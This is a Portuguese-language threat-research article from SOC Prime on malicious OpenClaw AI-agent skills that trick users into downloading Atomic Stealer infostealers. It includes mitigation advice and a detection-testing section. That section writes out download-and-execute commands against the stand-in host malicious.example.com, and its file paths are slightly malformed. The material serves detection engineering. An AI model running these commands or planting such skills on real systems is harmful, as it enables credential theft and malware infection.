SOC Prime Bias: Crítico

04 Feb 2026 14:31 UTC

De Automação à Infecção: Como as Habilidades do Agente AI do OpenClaw Estão Sendo Armadas

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
De Automação à Infecção: Como as Habilidades do Agente AI do OpenClaw Estão Sendo Armadas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O artigo explica como habilidades maliciosas do OpenClaw estão sendo usadas como um mecanismo de entrega de malware para usuários da plataforma de agente de IA auto-hospedada. Atores mal-intencionados publicam habilidades que parecem inofensivas, mas que, em última análise, orientam as vítimas a baixar e executar binários controlados por atacantes de fontes externas. As cargas observadas incluem executáveis do Windows e arquivos Mach-O do macOS identificados como variantes da família de infostealers Atomic Stealer. Esta atividade introduz um risco prático de cadeia de suprimentos para estações de trabalho pessoais e de desenvolvedores que dependem de habilidades fornecidas pela comunidade.

Investigação

O VirusTotal Code Insight revisou mais de três mil habilidades do OpenClaw e encontrou centenas que exibiam comportamentos maliciosos ou de alto risco. Em um exemplo, uma habilidade carregada por hightower6eu fornecia instruções passo a passo para baixar um arquivo ZIP protegido por senha do GitHub (senha: openclaw) e executar openclaw-agent.exe no Windows. No macOS, a mesma habilidade direcionava os usuários a recuperar um script codificado em Base64 do glot.io, que então baixava um executável Mach-O para execução. Os binários resultantes foram detectados por vários motores de segurança como infostealers trojanizados.

Mitigação

Trate os repositórios de habilidades como código não confiável e execute o OpenClaw em um ambiente isolado ou altamente restrito. Evite colar comandos de descrições de habilidades e não execute binários obtidos de links externos não verificados. Para operadores de mercado e comunidade, implemente a varredura no momento da publicação, focada no comportamento de download remoto, lógica de script ofuscada e indicadores de roubo de credenciais ou exfiltração de dados. Em ambientes empresariais, eduque os usuários sobre os riscos de instalar habilidades criadas pela comunidade e exija revisão antes do uso.

Resposta

Procure pacotes de habilidades do OpenClaw que referenciam URLs de download externos, arquivos protegidos por senha ou stagers de comando codificados. Alerta quando da execução de binários desconhecidos chamados openclaw-agent.exe e de lançamentos suspeitos de Mach-O que seguem atividade de download scriptada. Bloqueie a conectividade com domínios maliciosos conhecidos e isole sistemas impactados para triagem forense a fim de confirmar se ocorreu execução de infostealer e exposição de credenciais.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Verificação Pré‑voo de Telemetria e Linha de Base deve ter sido aprovado.

Motivo: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e objetivar gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa de Ataque e Comandos:
    Um atacante obteve acesso inicial a uma estação de trabalho da vítima e solta o binário malicioso openclaw-agent.exe no diretório temporário do usuário. O binário é executado com uma linha de comando que contém explicitamente as palavras-chave baixar and executar para obter cargas adicionais de um servidor C2 não confiável e executá-las na memória. O atacante usa um prompt de comando padrão do Windows para evitar detecções específicas do PowerShell, correspondendo assim às expectativas da regra Sigma.

    1. Soltar a carga útil:
      $malPath = "$env:TEMPopenclaw-agent.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath
    2. Execute com argumentos suspeitos:
      "%TEMP%openclaw-agent.exe" baixar http://malicious.example.com/payload.bin executar
    3. O agente contata o servidor C2, baixa payload.bin, escreve no disco e a lança, enquanto a linha de comando do processo original ainda contém as palavras de gatilho.
  • Script de Teste de Regressão:

    # -----------------------------------------------------------------------
    # Simulação de Execução do Agente OpenClaw – aciona a detecção Sigma
    # -----------------------------------------------------------------------
    # 1. Baixe o agente malicioso (simulado com um arquivo inofensivo)
    $agentUrl   = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi"  # arquivo inofensivo de marcador de posição
    $agentPath  = "$env:TEMPopenclaw-agent.exe"
    Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath
    
    # 2. Execute o agente com as palavras-chave esperadas na linha de comando
    $cmd = "`"$agentPath`" baixar http://malicious.example.com/payload.bin executar"
    Write-Host "Executando: $cmd"
    Start-Process -FilePath $agentPath -ArgumentList "baixar http://malicious.example.com/payload.bin executar" -NoNewWindow -Wait
    
    # 3. Opcional: Simule o download da carga útil (stub inofensivo)
    $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md"
    $payloadPath = "$env:TEMPpayload.bin"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath
    
    Write-Host "Simulação completa. Verifique o SIEM para detecção."
  • Comandos de Limpeza:

    # Remova todos os artefatos criados durante a simulação
    $paths = @(
        "$env:TEMPopenclaw-agent.exe",
        "$env:TEMPpayload.bin"
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            Remove-Item -Path $p -Force
            Write-Host "Deleted $p"
        }
    }